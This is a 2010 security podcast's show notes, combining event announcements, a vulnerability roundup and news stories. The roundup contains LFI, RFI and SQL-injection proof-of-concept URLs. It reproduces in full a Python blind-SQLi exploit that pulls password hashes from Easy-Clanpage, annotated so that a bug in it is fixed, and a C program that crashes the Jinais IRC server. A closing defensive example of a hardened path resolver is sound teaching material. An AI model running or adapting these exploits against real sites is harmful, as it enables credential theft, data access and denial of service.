ISD Podcast Episode 96 for March 26, 2010. This podcast is our contribution back to the community: we discuss the vulnerabilities of interest and information security related news, hopefully providing you a few laughs and a little knowledge.
Announcements:
MyHardDriveDied.com:
- The Data Recovery Class is $3500 (the price is the same for every session below). To reserve a seat and register, complete this form and return it to me by email (smoulton@nicservices.com) or fax (770-926-7089), or use http://www.myharddrivedied.com/seated-class-cc-form.pdf. Here are the current dates and locations for the classes:
- Washington DC – April 12th to 16th
- San Diego – May 10th-14th
- San Francisco – June 14th -18th
- Atlanta – July – 12th-16th
- Chicago – September – 13th – 17th
- Dallas, TX – October – 11th – 15th
- Washington DC – December 6th – 10th
- Hard Drive Kung Fu Magic – Outerzone 6 2010 by Scott Moulton
SANS Community Atlanta:
- SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression April 15 – 21, 2010 (http://www.sans.org/atlanta-security-leadership-2010-cs)
- SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)
SANS Mentoring Program:
- Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)
Notacon 7
- April 15th – 18th, 2010 Cleveland, Ohio
- http://notacon.org/
- Adrian will be there presenting on Anti-Forensics
Kentuckiana Metasploit Class
- May 8, 2010 Jeffersonville, Indiana
- (No URL for that as of yet)
- Proceeds will be going to the Hackers for Charity Food For Work Program
Friends of the Podcast:
Webhosting services: WebSpeedway
Vulnerabilities of Interest:
- justVisual 2.0 (index.php?p=) is subject to a Local File Inclusion (LFI) vulnerability. The value of p has the string ".php" stripped, is glued onto ../control/ and is passed to include; the only check is file_exists() on the assembled path, which says nothing about whether that path is still inside the control directory. Note the commented-out basename() call: it would have discarded directory components, and the str_replace() that took its place does not. Vulnerable code (index.php):

<?php
ob_start();//;print_r($_GET);
error_reporting(E_ALL);
function __autoload($class_name){
    $f=realpath('..').'/classes/'.$class_name.'.php';
    if (file_exists($f))
        require_once $f ;
    else {
        die('File '.$f.' does not exist. Referer: '.(isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : 'none').'<br/>');
    }
}
Config::init();
$xmldb=XmlDb::getInstance();
$selfname=basename($_SERVER['PHP_SELF'],'.php');
if(isset($_GET['p']) && !empty($_GET['p'])) {
    //$selfname=basename($_GET['p'],'.php');
    $selfname=str_replace('.php','',$_GET['p']);
    $filepath=dirname(dirname($_SERVER['SCRIPT_FILENAME'])).'/control/'.$selfname.'.php';//echo $selfname;
    if(!file_exists($filepath)) {
        include '../control/defaultcontrol.php';
    }
    else
        include '../control/'.$selfname.'.php';
}

Proof of Concept is available: http://www.sample.com/index.php?p=[LFI]

- Joomla component com_universal (UWCMS Universal Web CMS) 1.0.0 is subject to a Remote File Inclusion (RFI) vulnerability. config.html.php builds its require_once() path from the global $mosConfig_absolute_path without setting it or guarding against direct access; the proof of concept supplies that variable on the query string, which only reaches the script when register_globals is enabled, and with a remote URL in it PHP fetches and executes whatever that server returns (subject to allow_url_include). Vulnerable code (/includes/config/config.html.php):

global $mosConfig_absolute_path;
require_once($mosConfig_absolute_path."/administrator/components/com_universal/includes/config/configuracion.php");

Proof of Concept is available: http://www.sample.com/administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=[sh3ll inj3ct0r]
- N-13 News is subject to a File Disclosure vulnerability. Example URL is available: http://www.sample.com/modules/login.php?default_login_language={FILE}
- CF Image Hosting Script is subject to a File Disclosure vulnerability. Version 1.0 is impacted. Example URL is available: http://www.sample.com/?img=../{FILE}
- Easy-Clanpage is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Easy-Clanpage 2.2 and versions prior to and including Easy-Clanpage 2.0 are vulnerable; other versions may be affected as well. The id parameter of the user details page is injectable. The first example URL pulls username and password out in one UNION query; the second is the boolean-based blind form (predicate true: the profile row comes back; false: no row and a mysql_result() warning in the page) that the exploit below automates one character at a time. Example URLs are available:
http://www.sample.com/[path]/?section=user&action=details&id=-1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7/**/from/**/ecp_user/**/where/**/userid=1/*
http://www.sample.com/ecp_version2/?section=user&action=details&func=stats&id=1+and+1=1+and+ascii(substring((SELECT password FROM ecp_user+WHERE+userID=1 LIMIT 0,1),1,1))>1
The following exploit is available:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Python 2 script (print statement, urllib2), as originally published.
import sys, urllib2, getopt

def out(str):
    sys.stdout.write(str)
    sys.stdout.flush()

class Exploit:
    charset = "0123456789abcdefABCDEF"   # hex digits: the password column holds an MD5 hash
    url = ""
    charn = 1
    id = 1
    table_prefix = ""
    table_field = ""
    passwd = ""
    columns = []
    find_passwd = True

    def __init__(self):
        if len(sys.argv) < 2:
            usage = [
                "Usage:",
                "  python exploit.py [OPTION...] [SWITCH...] <url>",
                "",
                "Example:",
                "",
                "  Get the password of the user with id 2:",
                "  python exploit.py --id 2 http://site.de/ecp/",
                "",
                "  Get email and username of id 1:",
                "  python exploit.py --columns 80:email,25:username --nopw http://site.de/ecp/",
                "",
                "Switches:",
                "  --nopw                                 Search no password",
                "",
                "Options:",
                "  --id=<user id>                         User id",
                "  --prefix=<table prefix>                Table prefix of ECP",
                "  --columns=<max_chars:column_name,...>  Get value of any column you want",
            ]
            print "*" * 77
            print "******************** Easy-Clanpage V2.0 Profil Page Hack ********************"
            print "*" * 77
            print "* " + "Discovered and vulnerability by Easy Laster".ljust(73) + " *"
            print "* " + "coded by Dr.ChAoS".ljust(73) + " *"
            print "*" * 77
            for line in usage:
                print "* " + line.ljust(73) + " *"
            print "*" * 77
            exit()
        opts, switches = getopt.getopt(sys.argv[1:], "", ["id=", "prefix=", "columns=", "nopw"])
        for opt in opts:
            if opt[0] == "--id":
                self.id = int(opt[1])
            elif opt[0] == "--prefix":
                self.table_prefix = opt[1]
            elif opt[0] == "--columns":
                for col in opt[1].split(","):
                    max_chars, name = col.split(":")
                    self.columns.append([max_chars, name, ""])
            elif opt[0] == "--nopw":
                self.find_passwd = False
        for switch in switches:
            if switch[:4] == "http":
                if switch[-1:] == "/":
                    self.url = switch
                else:
                    self.url = switch + "/"

    def generate_url(self, ascii):
        # Boolean oracle: the page renders the profile when the character at
        # position charn of the selected field is > ascii, and emits a
        # mysql_result() warning (no row) when it is not.
        return self.url + "index.php?section=user&action=details&func=stats&id=1+and+1=1+and+ascii(substring((SELECT%20" + self.table_field + "%20FROM%20" + self.table_prefix + "ecp_user%20WHERE%20userID=" + str(self.id) + "%20LIMIT%200,1)," + str(self.charn) + ",1))%3E" + str(ord(ascii))

    def start(self):
        print "Exploiting..."
        if self.find_passwd:
            self.password()
        if len(self.columns) > 0:
            self.read_columns()
        print "All finished!\n"
        print "------ Results ------"
        if len(self.columns) > 0:
            for v in self.columns:
                print "Column \"" + v[1] + "\": " + v[2]
        if self.find_passwd:
            if len(self.passwd) == 32:
                print "Password: " + self.passwd
            else:
                print "Password not found!"
        print "--------------------"

    def read_columns(self):
        # Full byte range with 0 first: ascii('') is 0, so a hit on 0 means the
        # value has ended.  Candidates must be in ascending order for "first c
        # for which value > c is false" to identify value == c.
        charrange = [0]
        charrange.extend(range(32, 256))
        for i in range(len(self.columns)):
            out("Getting value of \"" + self.columns[i][1] + "\": ")
            self.table_field = self.columns[i][1]
            # Reset per column.  As published, the flag carried over from the
            # previous column, so only the first requested column was ever read.
            end = False
            for pwc in range(1, int(self.columns[i][0]) + 1):
                if end:
                    break
                self.charn = pwc
                for c in charrange:
                    src = urllib2.urlopen(self.generate_url(chr(c))).read()
                    if "<b>Warning</b>: mysql_result() [" in src:
                        if c == 0:
                            end = True
                        else:
                            self.columns[i][2] += chr(c)
                            out(chr(c))
                        break
            out("\n")

    def password(self):
        out("Getting password: ")
        self.table_field = "password"
        # One hex digit at a time over the 32 positions of the MD5 hash.  The
        # charset is walked in order, so it must be sorted by byte value for the
        # test to pin the character; the trailing "ABCDEF" sort below "a" and can
        # therefore never be selected.
        for pwc in range(1, 33):
            self.charn = pwc
            for c in self.charset:
                src = urllib2.urlopen(self.generate_url(c)).read()
                if "<b>Warning</b>: mysql_result() [" in src:
                    self.passwd += c
                    out(c)
                    break
        out("\n")

exploit = Exploit()
exploit.start()

- Jinais IRC Server is subject to a remote denial-of-service vulnerability. An attacker may exploit this issue to crash the application, resulting in a denial-of-service condition. Jinais 0.1.8 is vulnerable; other versions may also be affected. Exploit code is available:
/*
Jinais IRC Server 0.1.8 - NULL Pointer PoC

This PoC will disconnect the affected target IRC server using
a NULL Pointer vulnerability.

Copyright 2010 Salvatore Fresta aka Drosophila

This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version
2 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be
useful, but WITHOUT ANY WARRANTY; without even the implied
warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public
License along with this program; if not, write to the Free
Software Foundation,Inc., 59 Temple Place, Suite 330, Boston,
MA 02111-1307 USA

http://www.gnu.org/licenses/gpl-2.0.txt
*/

#include <stdio.h>
#include <string.h>
#include <getopt.h>
#include <stdlib.h>
#include <time.h>

#ifdef WIN32
#include <winsock.h>
#define close closesocket
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#endif

#define BUFF_SIZE 256
#define DEFAULT_PORT 4002

int socket_connect(char *server, int port);
char *socket_receive(int sock, int tout);
int socket_send(int socket, char *buffer, size_t size);
int socket_close(int socket);

int main(int argc, char *argv[]) {
    int sd,
        rnd_num,
        len,
        port = DEFAULT_PORT;
    char pkg[BUFF_SIZE],
         *response = NULL,
         *host = NULL;

    if(argc < 2) {
        printf("\nJinais IRC Server 0.1.8 NULL Pointer PoC - (c) Salvatore Fresta"
               "\nhttp://www.salvatorefresta.net"
               "\n"
               "\nUsage: %s <target_hostname> <port> (default: %d)\n\n", argv[0], port);
        return -1;
    }

    srand(time(NULL));
    host = argv[1];
    if(argc > 2) port = atoi(argv[2]);

    printf("\nJinais IRC Server 0.1.8 NULL Pointer PoC - (c) Salvatore Fresta"
           "\nhttp://www.salvatorefresta.net"
           "\n\n[*] Connecting to %s:%d...", host, port);

    sd = socket_connect(host, port);
    if(sd < 0) {
        printf("\n[-] Error on connect!\n\n");
        return -1;
    }

    printf("\n[+] Connection established"
           "\n[*] Logging in to IRC server...");

login:
    /* Register with a random nick; retry on a collision. */
    rnd_num = rand()%100+1;
    len = snprintf(pkg, sizeof(pkg), "NICK randomnickname%d\r\n", rnd_num);
    if(len < 0 || len >= (int)sizeof(pkg)) {
        perror("\n[-] Error: snprintf");
        socket_close(sd);
        return -1;
    }

    if(socket_send(sd, pkg, len) < 0) {
        perror("\n[-] Error: socket_send");
        socket_close(sd);
        return -1;
    }

    response = socket_receive(sd, 3);
    if(!response) {
        perror("\n[-] Error: socket_receive");
        socket_close(sd);
        return -1;
    }

    if(strstr(response, "Nickname is already in use")) {
        free(response);
        goto login;
    }
    free(response);

    printf("\n[+] Login successful"
           "\n[*] Data sending...");

    /* USER registration followed by a TOPIC request for a channel nobody has
       created: this is the request that triggers the NULL pointer dereference. */
    rnd_num = rand()%100+1;
    len = snprintf(pkg, sizeof(pkg), "USER blabla\r\nTOPIC #ch%d\r\n", rnd_num);
    if(len < 0 || len >= (int)sizeof(pkg)) {
        perror("\n[-] Error: snprintf");
        socket_close(sd);
        return -1;
    }

    if(socket_send(sd, pkg, len) < 0) {
        perror("\n[-] Error: socket_send");
        socket_close(sd);
        return -1;
    }

    /* NULL means timeout, EOF or error with nothing received; after the TOPIC
       a server that has just died shows up this way as well. */
    response = socket_receive(sd, 3);
    if(!response) {
        perror("\n[-] Error: socket_receive");
        socket_close(sd);
        return -1;
    }
    free(response);

    socket_close(sd);
    printf("\n[+] Data sent successfully"
           "\n[+] Connection closed\n\n");
    return 0;
}

int socket_connect(char *server, int port) {
    int sd;
    struct sockaddr_in sock;
    struct hostent *host = NULL;

#ifdef WIN32
    WSADATA wsadata;
    if(WSAStartup(MAKEWORD(1,0), &wsadata)) return -1;
#endif

    memset(&sock, 0, sizeof(sock));
    if((sd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;
    sock.sin_family = AF_INET;
    sock.sin_port = htons(port);

    if(!(host=gethostbyname(server))) return -1;
    sock.sin_addr = *((struct in_addr *)host->h_addr);
    if(connect(sd, (struct sockaddr *) &sock, sizeof(sock)) < 0) return -1;
    return sd;
}

char *socket_receive(int sock, int tout) {
    int ret,
        byte_recv,
        oldpkglen = 0,
        pkglen = 0;
    char *buffer = NULL,
         tmp[128];
    struct timeval timeout;
    fd_set input;

    if(sock < 0) return NULL;

    /* Accumulate everything the peer sends until it goes quiet for tout
       seconds (or closes the connection). */
    while (1) {
        FD_ZERO(&input);
        FD_SET(sock, &input);

        if(tout > 0) {
            timeout.tv_sec = tout;
            timeout.tv_usec = 0;
            ret = select(sock + 1, &input, NULL, NULL, &timeout);
        }
        else
            ret = select(sock + 1, &input, NULL, NULL, NULL);

        if (!ret) break;
        if (ret < 0) return NULL;

        byte_recv = recv(sock, tmp, sizeof(tmp), 0);
        if(byte_recv < 0) return NULL;
        if(!byte_recv) break;

        oldpkglen = pkglen;
        pkglen += byte_recv;
        buffer = (char *) realloc(buffer, pkglen+1);
        if(!buffer) return NULL;
        memcpy(buffer+oldpkglen, tmp, byte_recv);
    }

    if(buffer) buffer[pkglen] = 0;
    return buffer;
}

int socket_send(int socket, char *buffer, size_t size) {
    if(socket < 0) return -1;
    return send(socket, buffer, size, 0) < 0 ? -1 : 0;
}

int socket_close(int socket) {
    if(socket < 0) return -1;
    return close(socket) < 0 ? -1 : 0;
}
- New-CMS is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. New-CMS 1.21 and prior are vulnerable. Example URL is available: http://www.sample.com/index.php?pg=[LFI]
- From the Pwn2Own Contest: Microsoft Internet Explorer is subject to multiple unspecified remote code-execution vulnerabilities. Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions. The vulnerabilities affect Internet Explorer 8; other versions may be vulnerable as well. The researcher responsible for discovering these issues has developed exploit code to trigger the vulnerabilities. This exploit code is not known to be publicly available.
- From the Pwn2Own Contest: Apple Safari is prone to an unspecified remote code-execution vulnerability. Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions. This vulnerability affects Apple Safari 4 versions running on the Mac OS X platform; other versions may be vulnerable as well. The researcher responsible for discovering this issue has developed exploit code to trigger this vulnerability. This exploit code is not known to be publicly available.
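The justVisual, N-13 News, CF Image Hosting and New-CMS items above share one defect: a request parameter (p=, default_login_language=, img=, pg=) is joined onto a directory and handed to include or a file read, with at most a string replace or a file_exists() check in between, and neither of those says anything about where the assembled path ends up. The Python below is an added example, not code from the page or from any of those projects. It mirrors the two vulnerable shapes (the justVisual control resolver and the ?img=../{FILE} read) against a constructed directory tree, and puts a hardened resolver beside them that allowlists the name and still verifies containment of the resolved path. The directory and file names (control/, images/, home.php, logo.png, config.inc) are assumptions for the demo.

```python
import os
import re
import tempfile

# Assumption for the demo: the application's control scripts and image files
# are named with plain identifiers, so that is all a request may name.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def vulnerable_resolve(app_root, p):
    """Mirror of the justVisual index.php logic: strip the string '.php',
    glue the value onto <app_root>/control/ and append '.php'.  Nothing here
    constrains where the result points, so '..' sequences in p walk out of
    control/ before file_exists() or include ever see the path."""
    selfname = p.replace(".php", "")
    return os.path.normpath(os.path.join(app_root, "control", selfname + ".php"))


def vulnerable_read(web_root, img):
    """Mirror of the '?img=../{FILE}' disclosure pattern: the parameter is
    joined onto an image directory (name assumed here) and read back verbatim."""
    with open(os.path.join(web_root, "images", img), "rb") as f:
        return f.read()


def is_contained(base_dir, path):
    """True when path, after '..' and symlink resolution, lies inside base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(path)
    return target == base or target.startswith(base + os.sep)


def safe_resolve(base_dir, name, suffix=""):
    """Hardened resolver for both patterns: reject NUL bytes and anything that
    is not a plain identifier, then still verify containment of the resolved
    path and that it is a regular file before it is used."""
    if "\x00" in name or not SAFE_NAME.match(name):
        raise ValueError("rejected name: %r" % name)
    path = os.path.join(base_dir, name + suffix)
    if not is_contained(base_dir, path) or not os.path.isfile(path):
        raise ValueError("rejected name: %r" % name)
    return os.path.realpath(path)


def demo_root():
    """Constructed tree: <root>/control/home.php, <root>/images/logo.png and
    <root>/config.inc, which sits outside both served directories."""
    root = tempfile.mkdtemp(prefix="lfi_demo_")
    os.mkdir(os.path.join(root, "control"))
    os.mkdir(os.path.join(root, "images"))
    with open(os.path.join(root, "control", "home.php"), "w") as f:
        f.write("<?php echo 'home'; ?>\n")
    with open(os.path.join(root, "images", "logo.png"), "wb") as f:
        f.write(b"\x89PNG (constructed)\n")
    with open(os.path.join(root, "config.inc"), "w") as f:
        f.write("db_pass=constructed-secret\n")
    return root


if __name__ == "__main__":
    root = demo_root()
    control = os.path.join(root, "control")
    for p in ("home", "../config.inc"):
        path = vulnerable_resolve(root, p)
        print("p=%-15s -> %s (inside control/: %s)" % (p, path, is_contained(control, path)))
    print("img=../config.inc ->", vulnerable_read(root, "../config.inc"))
    print("safe_resolve(home) ->", safe_resolve(control, "home", ".php"))
    for bad in ("../config.inc", "home\x00", "..", ""):
        try:
            safe_resolve(control, bad, ".php")
        except ValueError as err:
            print("safe_resolve:", err)
```

The allowlist is the real control. The realpath containment check is there for what an allowlist does not see, such as a symlink inside the directory that points out of it, and it is the check to keep when the parameter cannot be restricted to an identifier.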
Stories of Interest:
News item 1: http://www.wired.com/threatlevel/2010/03/tjx-sentencing/
Convicted TJX hacker Albert Gonzalez was sentenced to 20 years in prison on Thursday for leading a gang of cyberthieves who stole more than 90 million credit and debit card numbers from TJX and other retailers.
The sentence for the largest computer-crime case ever prosecuted is the lengthiest ever imposed in the United States for hacking or identity-theft. Gonzalez was also fined $25,000. Restitution, which will likely be in the tens of millions, was not decided Thursday.
Clean-cut, wearing a beige jail uniform and wireframe glasses, the 28-year-old Gonzalez sat motionless at his chair during Thursday’s proceedings, his hands folded in front of him.
Before the sentence was pronounced, Gonzalez told the court he deeply regrets his crimes, and is remorseful for having taken advantage of the personal relationships he’d forged. “Particularly one I had with a certain government agency – that gave me a second chance in life,” said the hacker, who had worked as a paid informant for the Secret Service. “I blame nobody but myself.”
News item 2: http://www.nytimes.com/2010/03/21/world/asia/21grid.html
It came as a surprise this month to Wang Jianwei, a graduate engineering student in Liaoning, China, that he had been described as a potential cyberwarrior before the United States Congress.
Larry M. Wortzel, a military strategist and China specialist, told the House Foreign Affairs Committee on March 10th that it should be concerned because “Chinese researchers at the Institute of Systems Engineering of Dalian University of Technology published a paper on how to attack a small U.S. power grid sub-network in a way that would cause a cascading failure of the entire U.S.”
When reached by telephone, Mr. Wang said he and his professor had indeed published “Cascade-Based Attack Vulnerability on the U.S. Power Grid” in an international journal called Safety Science last spring. But Mr. Wang said he had simply been trying to find ways to enhance the stability of power grids by exploring potential vulnerabilities.
“We usually say ‘attack’ so you can see what would happen,” he said. “My emphasis is on how you can protect this. My goal is to find a solution to make the network safer and better protected.” And independent American scientists who read his paper said it was true: Mr. Wang’s work was a conventional technical exercise that in no way could be used to take down a power grid.
News item 3: http://www.computerworld.com/s/article/9174078/iPhone_Safari_IE8_Firefox_all_fall_on_day_one_of_Pwn2Own?taxonomyId=17
Hackers took down Apple’s iPhone and Safari browser, Microsoft’s Internet Explorer 8 (IE8) and Mozilla’s Firefox within minutes at today’s Pwn2Own contest, as expected.
The two-man team of Vincenzo Iozzo and Ralf-Philipp Weinmann exploited the iPhone in under five minutes, said a spokeswoman for 3Com TippingPoint, the security company that sponsored the contest. The pair also walked away with $15,000 in cash, a record prize for the challenge, which is in its fourth year.
Iozzo, an Italian college student, works for Zynamics GmbH, the company headed by noted researcher Thomas Dullien, better known as Halvar Flake, while Weinmann is a post-doctoral researcher at the Laboratory of Algorithms, Cryptology and Security at the University of Luxembourg.
Weinmann is probably best known for being part of a three-man team that in 2007 demonstrated how to crack the Wi-Fi security protocol WEP much faster than previously thought possible.
News item 4: https://www.infosecisland.com/articleview/3392-Durex-condom-orders-exposed-on-the-Internet.html
Earlier we talked about a security problem involving the web site of a Durex product. On March 5, a customer reportedly discovered that anyone could view his and other customers’ orders on the kohinoorpassion.com web site by simply inserting a different order ID number in the url without any login required. Names, addresses, phone numbers, and type of products ordered were all there for ready viewing. The orders had not been placed on the kohinoorpassion.com web site, but on the Durex India e-store site.
From what the customer could determine, the earliest order exposed online dated back to February 23, 2009, but there is no confirmation as to for how long the customer records might have been accessible without a login. According to the customer’s web site about the breach, no credit card or financial data were exposed.
The customer reported that he promptly contacted TTK-LIG (the marketer of the Durex brand in India and manufacturer of Kohinoor condoms) and SSL International (the owner of the Durex brand worldwide) about the problem and that by the next day, the site appeared to be better secured. But that wasn’t the end of the story, it seems. The customer created his own web site and FAQ about the breach and has been updating it since then. A review of the updates suggests that things took an ugly turn within a matter of weeks.